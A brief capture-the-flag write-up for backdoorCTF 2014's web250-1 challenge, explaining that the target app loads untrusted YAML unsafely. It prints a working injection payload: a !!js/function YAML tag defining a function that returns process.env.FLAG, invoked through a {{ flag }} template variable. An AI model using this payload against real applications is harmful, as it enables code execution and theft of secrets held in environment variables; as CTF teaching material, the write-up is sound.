backdoorCTF 2014 - web250-1 writeup
Sunday, 23 March 2014، 03:37 AM
Here's the app's code.
and take your flag away.
Pretty much like the web100-2 task, we should inject js code into the template, such that it has access to js global context.
That's not hard, just RTFM, and you'll see how load is considered unsafe, and should NOT be used to load untrusted data sources.
Let's exploit it:
---
flag: !!js/function >
function flag() {
return process.env.FLAG;
}
---
{{ flag }}and take your flag away.
